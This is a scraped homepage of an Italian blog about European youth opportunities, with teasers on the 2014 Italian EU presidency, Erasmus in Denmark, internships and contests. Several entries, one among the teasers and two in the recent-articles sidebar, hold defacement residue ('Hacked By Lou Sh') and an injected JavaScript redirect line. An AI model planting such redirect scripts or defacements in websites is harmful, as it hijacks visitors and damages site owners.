EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Opportunità europee

Opportunità europee


Opportunità europee

it

Il primo luglio 2014 l’Italia assumerà la Presidenza del Consiglio dell’Unione europea: sei mesi per dirigere l’agenda europea, discutere le priorità e raggiungere conclusioni in un’Europa rinforzata dalle elezioni del prossimo maggio.

Sei mesi che, se condivisi e sfruttati da tutti gli italiani bruxellesi, riusciranno a promuovere la presidenza italiana e l’Italia attraverso la proposizione e realizzazione di idee e contenuti concreti, realizzabili con un investimento minimo di denaro, consapevoli che mettendo insieme le (...)

it

Raramente ci si annoia durante le lezioni in Danimarca. Puoi lavorare a maglia o preparare una spremuta d'arancia. L'importante è garantire il 75% delle presenze e saper fare più attività insieme. Una delle quali quasi obbligatoria: partecipare in aula. Niente di strano se lo si fa sferruzzando un cappellino!

Continuamente stimolati alla discussione, capita spesso che gli studenti danesi a lezione parlino più dell’insegnante. Abituati agli interventi in pubblico e ai lavori di gruppo, interagiscono disinvolti tra loro e con i docenti mantenendo dinamico l’apprendimento e alto il livello di (...)

it

La partenza e l'arrivo: il primo impatto con un'avventura chiamata Erasmus.

Il mio primo giorno in Danimarca lo ricordo seduta su una panchina mangiando insalata. Niente di meno indicato per il pranzo al sacco in una domenica danese di fine gennaio. Aveva nevicato tutto il giorno, continuava a nevicare sulla mia insalata e avrebbe proseguito per i due mesi successivi. (...)

it

L'European Youth Media Days 2013, evento realizzato in collaborazione tra l’Europarlamento e l’European Youth Press, si concentrerà su temi di attualità dell’Unione europea e in particolare sulle elezioni europee del maggio 2014.

Un messaggio, una poesia, un libro, un articolo: scrivere. È il sogno di milioni di ragazzi aspiranti giornalisti che trovano nella scrittura un modo per manifestare il proprio pensiero.

È per questo che il Parlamento europeo invita giovani giornalisti e aspiranti tali a partecipare all’European (...)

it

window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" Hacked By Lou Sh If you are not redirected automatically, follow the link to example

window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" Hacked By Lou Sh If you are not redirected automatically, follow the link to example

it

La metà di loro ha deciso di emigrare: forse per libera scelta. O forse perché in Italia la fuga dei cervelli non è soltanto una chiacchiera da bar. Una cosa però è certa: questi ragazzi sono pronti a rientrare per rappresentare il proprio Stato! È pronta infatti la delegazione giovanile italiana che volerà al Y8, il side-event del G8, in programma a Londra dal 24 al 28 giugno.

Le otto figure richieste al Summit hanno ora un volto e un nome. E forse a Londra non si farà la storia, ma finalmente si farà buona politica, partendo dal basso con impegno, dedizione e passione.

La delegazione

Il gruppo sarà guidato da Marco Garlatti, in veste di capo dello Stato: “Penso che da (...)

it

L’Isfol, istituto per lo sviluppo della formazione professionale dei lavoratori, opera da anni in collaborazione con i maggiori enti europei tra cui il Ministero del lavoro, amministrazioni statali, Regioni, Provincie autonome ed enti locali con l’obiettivo di formare ed orientare al meglio le politiche sociali del lavoro per far aumentare i tassi occupazionali soprattutto nel settore giovanile. Nel 2012 ha deciso di proporre un nuovo prontuario, dopo l’ultimo pubblicato quattro anni fa, dal titolo “Manuale dello stage in Europa”, per favorire lo sviluppo di tirocini, stage e apprendistati in Europa.

La guida si suddivide in 3 capitoli: nel primo vengono illustrate le motivazioni per le quali è importante fare uno stage a livello europeo e i vantaggi che può offrire soprattutto ai giovani che si trovano in un percorso di studi. E’ di utile supporto soprattutto perché rispetto alle altre nazioni (...)

it

Ha preso il via anche quest’anno “Nuovi talenti per l’Europa”, il concorso che coinvolge i giovani, realizzato in collaborazione con le Istituzioni nazionali e quelle europee. Per partecipare al concorso basta inviare un videoclip sulla “Cittadinanza europea” e i suoi vantaggi.

Lo scopo del contest, che rientra nell’operazione Nuovi Talenti lanciata dalla Rai nel 2008, è di rintracciare i talenti emergenti italiani per aprire così al dialogo e al confronto verso le nuove generazioni.

Il concorso ha da poco avuto inizio e terminerà il 3 giugno 2013, quando una giuria (...)

it

Lo scorso 11 febbraio Connie Hedegaard, Commissaria Ue per l'Azione per il clima, ha lanciato l'iniziativa “Un mondo come piace a te”, (A World You Like), che rientra nella campagna “Un mondo come piace a te, con il clima che vuoi”, inaugurata lo scorso ottobre.

Dal suo avvio l’operazione ha raccolto oltre 20.000 follower e più di 130 partner ufficiali, come autorità pubbliche, organizzazioni non governative, imprese e rappresentanti del mondo universitario.

Obiettivo dell’azione promossa dall’Ue è quello di rendere note le soluzioni più funzionali per (...)

it

Il concorso “L'Europa è casa tua”, bandito dall'IIC in collaborazione con il Ministero dell'Istruzione, dell'Università e della Ricerca, prende le mosse in questi giorni.

I due organismi puntano a sollecitare i partecipanti a rispondere con elaborati artistici a dei precisi quesiti: dove è l’Europa? Quanto è lontana da noi? Quali sono le differenze tra noi e gli altri cittadini europei? Quali diritti acquisiamo in qualità di appartenenti all’Unione europea?

Il (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato




Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France